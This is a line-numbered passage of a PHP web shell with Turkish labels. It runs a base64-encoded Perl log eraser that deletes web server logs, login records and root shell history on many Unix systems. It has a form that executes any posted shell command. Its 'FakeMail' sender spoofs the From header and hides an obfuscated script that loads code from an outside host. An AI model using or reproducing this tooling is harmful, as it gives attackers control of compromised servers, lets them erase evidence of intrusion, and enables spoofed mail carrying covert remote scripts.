  970. $erase = base64_decode("IyF1c3IvYmluL3BlcmwNCiMgQ1dTSGVsbA0KICAgICAgIGNob21wKCRvcyA9ICRBUkdWWzBdKTsNCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcIm1pc2NcIil7ICNJZiBtaXNjIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdbWlzYyBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCI8dHI+WytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYSA9IHVubGluayBAbWlzYzsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJIA0KICAgICAgICAgICAgaWYoJGEpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwib3BlbmJzZFwiKXsgI0lmIG9wZW5ic2QgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11vcGVuYnNkIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGIgPSB1bmxpbmsgQG9wZW5ic2Q7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgIGlmKCRiKSB7cHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7ICAgfQ0KCQkJZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJmcmVlYnNkXCIpeyAjSWYgZnJlZWJzZCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXWZyZWVic2QgU2VsZWN0ZWQuLi5cXG5cIjsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYyA9IHVubGluayBAZnJlZWJzZDsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRjKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJkZWJpYW5cIil7ICNJZiBEZWJpYW4gdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11kZWJpYW4gU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZCA9IHVubGluayBAZGViaWFuOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGQpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdXNlXCIpeyAjSWYgc3VzZSB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXXN1c2UgU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZSA9IHVubGluayBAc3VzZTsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgaWYoJGUpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSBlbHNlIHsgcHJpbnQgXCJbLV1FcnJvclwiOyB9DQogICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcInNvbGFyaXNcIil7ICNJZiBzb2xhcmlzIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdc29sYXJpcyBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRmID0gdW5saW5rIEBzb2xhcmlzOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGYpIHtwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwibGFtcHBcIil7ICNJZiBsYW1wcCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxhbXBwIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGcgPSB1bmxpbmsgQGxhbXBwOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICBpZigkZykgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkgICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJyZWRoYXRcIil7ICNJZiByZWRoYXQgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11SZWQgSGF0IExpbnV4L01hYyBPUyBYIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGggPSB1bmxpbmsgQHJlZGhhdDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRoKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KICAgICAgIA0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcImxpbnV4XCIpeyAjSWYgbGludXggdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11MaW51eCBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRpID0gdW5saW5rIEBsaW51eDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJaWYoJGkpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7fSANCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCgkJfSAgICAgIA0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdW5vc1wiKXsgI0lmIHN1bm9zIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICBwcmludCBcIlsrXVN1bk9TIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgICRsID0gdW5saW5rIEBzdW5vczsNCiAgICAgICAgICAgICAgaWYoJGwpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9ICAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgaWYoJG9zIGVxIFwiYWl4XCIpeyAjSWYgYWl4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICAgICBwcmludCBcIlsrXUFpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbSA9IHVubGluayBAYWl4Ow0KICAgICAgICAgICAgICBpZigkbSkgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgDQogICAgICAgICAgICAgIGlmKCRvcyBlcSBcImlyaXhcIil7ICNJZiBpcml4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0DQogICAgICAgICAgICAgIHByaW50IFwiWytdSXJpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbiA9IHVubGluayBAaXJpeDsgICANCiAgICAgICAgICAgICAgaWYoJG4pIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI01pc2MgTG9nIExvY2F0aW9ucyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICBAbWlzYyA9IChcIi9ldGMvaHR0cGQvbG9ncy9hY2Nlc3MubG9nXCIsIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yLmxvZ1wiLFwiL2V0Yy9odHRwZC9sb2dzL2FjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yX2xvZ1wiLFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2Vycm9yX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2FjY2Vzcy5sb2dcIixcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9hcGFjaGUvZXJyb3JfbG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLFwiL3Zhci9sb2cvYXBhY2hlL2Vycm9yLmxvZ1wiLFwiL3Zhci9sb2cvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9lcnJvcl9sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL3d3dy9sb2dzL2FjY2Vzcy5sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3JfbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvd3d3L2xvZ3MvYWNjZXNzX2xvZ1wiKQ0KICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBPcGVuQlNEIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBvcGVuYnNkID0gKFwiL3Zhci93d3cvbG9nL2FjY2Vzc19sb2dcIiwgXCIvdmFyL3d3dy9sb2cvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRnJlZUJTRCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAZnJlZWJzZCA9IChcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvYWNjZXNzX2xvZ1wiLCBcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRGViaWFuIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBkZWJpYW4gPSAoXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLCBcIi92YXIvbG9nL2FwYWNoZS9lcnJvci5sb2dcIiwNCiAgICAgICBcIi92YXIvbG9nL2FwYWNoZS1zc2wvZXJyb3IubG9nXCIsIFwiL3Zhci9sb2cvYXBhY2hlLXNzbC9hY2Nlc3MubG9nXCIpDQogICAgICAgICAgIH0gICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VTRSBMaW51eCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAc3VzZSA9IChcIi92YXIvbG9nL2h0dHBkL2FjY2Vzc19sb2dcIiwgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBTb2xhcmlzIFN5c3RlbXMNCiAgIA0KICAgICAgeyAgIA0KICAgICAgIEBzb2xhcmlzID0gKFwiL3Zhci9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsIFwiL3Zhci9hcGFjaGUvbG9ncy9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMYW1wcCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAbGFtcHAgPSAoXCIvb3B0L2xhbXBwL2xvZ3MvZXJyb3JfbG9nXCIsIFwiL29wdC9sYW1wcC9sb2dzL2FjY2Vzc19sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBSZWQgSGF0LCBNYWMgT1MgWCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAcmVkaGF0ID0gKFwiL3Zhci9sb2cvaHR0cGQvYWNjZXNzX2xvZ1wiLCBcIi92YXIvbG9nL2h0dHBkL2Vycm9yX2xvZ1wiKQ0KICAgICAgICAgICB9DQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICNMb2dzIG9mIElyaXggU3lzdGVtcw0KICAgDQogICAgICB7DQogICAgICAgQGlyaXggPSAoXCIvdmFyL2FkbS9TWVNMT0dcIiwgXCIvdmFyL2FkbS9zdWxvZ1wiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL2xhc3Rsb2cvXCIsDQogICAgICAgICAgICBcIi91c3Ivc3Bvb2wvbHAvbG9nXCIsIFwiL3Zhci9hZG0vbHAvbHAtZXJyc1wiLCBcIi91c3IvbGliL2Nyb24vbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2xvZ2lubG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwgXCIvdmFyL2FkbS9kdG1wXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2FjY3Qvc3VtL2xvZ2lubG9nXCIsIFwidmFyL2FkbS9YMG1zZ3NcIiwgXCIvdmFyL2FkbS9jcmFzaC92bWNvcmVcIiwNCiAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jhc2gvdW5peFwiKQ0KICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZyBzb2YgQWl4IFN5c3RlbXMNCiAgICAgIHsgICANCiAgICAgIEBhaXggPSAoXCIvdmFyL2FkbS9wYWNjdFwiLCBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS9kdG1wXCIsIFwiL3Zhci9hZG0vcWFjY3RcIiwgICANCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS9yYXMvZXJybG9nXCIsIFwiL3Zhci9hZG0vcmFzL2Jvb3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jvbi9sb2dcIiwgXCIvZXRjL3V0bXBcIiwgXCIvZXRjL3NlY3VyaXR5L2xhc3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL2V0Yy9zZWN1cml0eS9mYWlsZWRsb2dpblwiLCBcInVzci9zcG9vbC9tcXVldWUvc3lzbG9nXCIpICAgDQogICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VuT1MgU3lzdGVtcyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgQHN1bm9zID0gKFwiL3Zhci9hZG0vbWVzc2FnZXNcIiwgXCIvdmFyL2FkbS9hY3Vsb2dzXCIsIFwiL3Zhci9hZG0vYWN1bG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS92b2xkLmxvZ1wiLCBcIi92YXIvYWRtL3d0bXBcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvYWRtL2xvZy9hc3BwcC5sb2dcIiwgXCIvdmFyL2xvZy9zeXNsb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9QT1Bsb2dcIiwgXCIvdmFyL2xvZy9hdXRobG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xwL2xvZ3MvbHBzY2hlZFwiLCBcIi92YXIvbHAvbG9ncy9yZXF1ZXN0c1wiLA0KICAgICAgICAgICAgICBcIi92YXIvY3Jvbi9sb2dzXCIsIFwiL3Zhci9zYWYvX2xvZ1wiLCBcIi92YXIvc2FmL3BvcnQvbG9nXCIpDQogICAgICAgICB9ICAgICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMaW51eCBTeXN0ZW1zICAgICAgIA0KICAgICAgeyAgICAgDQogICAgICAgQGxpbnV4ID0gKFwiL3Zhci9sb2cvbGFzdGxvZ1wiLCBcIi92YXIvbG9nL3RlbG5ldGRcIiwgXCIvdmFyL3J1bi91dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvc2VjdXJlXCIsXCIvcm9vdC8ua3NoX2hpc3RvcnlcIiwgXCIvcm9vdC8uYmFzaF9oaXN0b3J5XCIsDQogICAgICAgICAgICAgICAgIFwiL3Jvb3QvLmJhc2hfbG9ndXRcIiwgXCIvdmFyL2xvZy93dG1wXCIsIFwiL2V0Yy93dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9ydW4vdXRtcFwiLCBcIi9ldGMvdXRtcFwiLCBcIi92YXIvbG9nXCIsIFwiL3Zhci9hZG1cIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FwYWNoZS9sb2dcIiwgXCIvdmFyL2FwYWNoZS9sb2dzXCIsIFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9nc1wiLA0KICAgICAgICAgICAgICAgICBcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3NcIiwgXCIvdmFyL2xvZy9hY2N0XCIsIFwiL3Zhci9sb2cveGZlcmxvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL21lc3NhZ2VzL1wiLCBcIi92YXIvbG9nL3Byb2Z0cGQveGZlcmxvZy5sZWdhY3lcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9wcm9mdHBkLnhmZXJsb2dcIiwgXCIvdmFyL2xvZy9wcm9mdHBkLmFjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIiwgXCIvdmFyL2xvZy9odHRwc2Qvc3NsX2xvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL2h0dHBzZC9zc2wuYWNjZXNzX2xvZ1wiLCBcIi9ldGMvbWFpbC9hY2Nlc3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9xbWFpbFwiLCBcIi92YXIvbG9nL3NtdHBkXCIsIFwiL3Zhci9sb2cvc2FtYmFcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9zYW1iYS5sb2cuJW1cIiwgXCIvdmFyL2xvY2svc2FtYmFcIiwgXCIvcm9vdC8uWGF1dGhvcml0eVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL3BvcGxvZ1wiLCBcIi92YXIvbG9nL25ld3MuYWxsXCIsIFwiL3Zhci9sb2cvc3Bvb2xlclwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuYWxsXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmV3cy9uZXdzLmNyaXRcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuZXJyXCIsIFwiL3Zhci9sb2cvbmV3cy9uZXdzLm5vdGljZVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3Mvc3Vjay5lcnJcIiwgXCIvdmFyL2xvZy9uZXdzL3N1Y2subm90aWNlXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9zcG9vbC90bXBcIiwgXCIvdmFyL3Nwb29sL2Vycm9yc1wiLCBcIi92YXIvc3Bvb2wvbG9nc1wiLCBcIi92YXIvc3Bvb2wvbG9ja3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdXNyL2xvY2FsL3d3dy9sb2dzL3RodHRwZF9sb2dcIiwgXCIvdmFyL2xvZy90aHR0cGRfbG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmNmdHBkL21pc2Nsb2cudHh0XCIsIFwiL3Zhci9sb2cvbmN0ZnBkLmVycnNcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9hdXRoXCIpDQogICAgICAgICB9DQogICAgICAgICANCiAgIA==");
  971.  
  972. $openp = fopen("logseraser.pl", "w+")or die("Error");
  973.  
  974. fwrite($openp, $erase)or die("Error");
  975.  
  976. fclose($openp);
  977.  
  978. $aidx = passthru("perl logseraser.pl ".$_POST['functionp']);
  979.  
  980. unlink("logseraser.pl");
  981.  
  982. echo "</textarea>";
  983.  
  984. }
  985.  
  986.  
  987.  
  988. if(isset($_POST['commex']))
  989.  
  990. {
  991.  
  992. echo "<tr><td>
  993.  
  994. <center><b><font size='2' face='Verdana'>CMD :]<br></font></b>
  995.  
  996.        <input name=cmd size=20 type=text>
  997.  
  998.        <select name=functionz>
  999.  
  1000.          <option>passthru</option>
  1001.  
  1002.          <option>popen</option>
  1003.  
  1004.          <option>exec</option>
  1005.  
  1006.          <option>shell_exec</option>
  1007.  
  1008.          <option>system</option>
  1009.  
  1010.        </select><br><input type='submit' name='cmdex' value='Enter'></table>";
  1011.  
  1012.    }
  1013.  
  1014.    if(isset($_POST['cmdex']))
  1015.  
  1016.    { echo "<tr><td>";
  1017.  
  1018.    switch (@$_POST['functionz']) {
  1019.  
  1020.     case "system":
  1021.  
  1022.     system(stripslashes($_POST['cmd']));
  1023.  
  1024.    
  1025.  
  1026.     break;
  1027.  
  1028.     case "popen":
  1029.  
  1030.     $handle = popen($_POST['cmd'].' 2>&1', 'r');
  1031.  
  1032.     echo "'$handle'; " . gettype($handle) . "\n";
  1033.  
  1034.     $read = fread($handle, 2096);
  1035.  
  1036.     echo $read;
  1037.  
  1038.     pclose($handle);
  1039.  
  1040.    
  1041.  
  1042.     break;
  1043.  
  1044.     case "shell_exec":
  1045.  
  1046.     shell_exec(stripslashes($_POST['cmd']));
  1047.  
  1048.    
  1049.  
  1050.  
  1051.  
  1052.     break;
  1053.  
  1054.     case "exec":
  1055.  
  1056.     exec(stripslashes($_POST['cmd']));
  1057.  
  1058.    
  1059.  
  1060.     break;
  1061.  
  1062.     case "passthru":
  1063.  
  1064.     passthru(stripslashes($_POST['cmd']));
  1065.  
  1066.    
  1067.  
  1068.     }
  1069.  
  1070.     }
  1071.  
  1072.  
  1073.  
  1074. elseif(isset($_POST['mail']))
  1075.  
  1076. {
  1077.  
  1078. echo "<form method='post' action=''>
  1079.  
  1080. <td valign=top><center><font face='Verdana' size='2'>FakeMail [HTML Onaylý]</font></center>
  1081.  
  1082. <center><font face='Verdana' size='1'>Kime:<br>
  1083.  
  1084. <input type='text' size='19' name='mto'><br>
  1085.  
  1086. Kimden:<br>
  1087.  
  1088. <input type='text' size='19' name='mfrom'><br>
  1089.  
  1090. Konu:<br>
  1091.  
  1092. <input type='text' size='19' name='mobj'><br>
  1093.  
  1094. Mesaj:<br>
  1095.  
  1096. <textarea name='mtext' cols=20 rows=4></textarea><br>
  1097.  
  1098. <br><input type='submit' value='Yolla' name='senm'>
  1099.  
  1100. </form></table><br>";}
  1101.  
  1102. if(isset($_POST['senm']))
  1103.  
  1104. {
  1105.  
  1106. //Mail With HTML   <- webcheatsheet.com
  1107.  
  1108. $to = $_POST['mto'];
  1109.  
  1110. $subject = $_POST['mobj'];
  1111.  
  1112. $contentz = $_POST['mtext']."<!--";
  1113.  
  1114. $random_hash = md5(date('r', time()));
  1115.  
  1116. $headers = "From: ".$_POST['mfrom']."\r\nReply-To: ".$_POST['mfrom'];
  1117.  
  1118. $headers .= "\r\nContent-Type: multipart/alternative; boundary=\"PHP-alt-".$random_hash."\"";
  1119.  
  1120. ob_start();
  1121.  
  1122. ?>
  1123.  
  1124. <script type="text/javascript" language="javascript">
  1125.  
  1126. <!--
  1127.  
  1128. ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
  1129.  
  1130. MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
  1131.  
  1132. OT="";
  1133.  
  1134. for(j=0;j<MI.length;j++){
  1135.  
  1136. OT+=ML.charAt(MI.charCodeAt(j)-48);
  1137.  
  1138. }document.write(OT);
  1139.  
  1140. // --></script>
  1141.  
  1142. --PHP-alt-<?php echo $random_hash; ?>
  1143.  
  1144. Content-Type: text/html; charset="iso-8859-1"
  1145.  
  1146. Content-Transfer-Encoding: 7bit
  1147.  
  1148.  
  1149.  
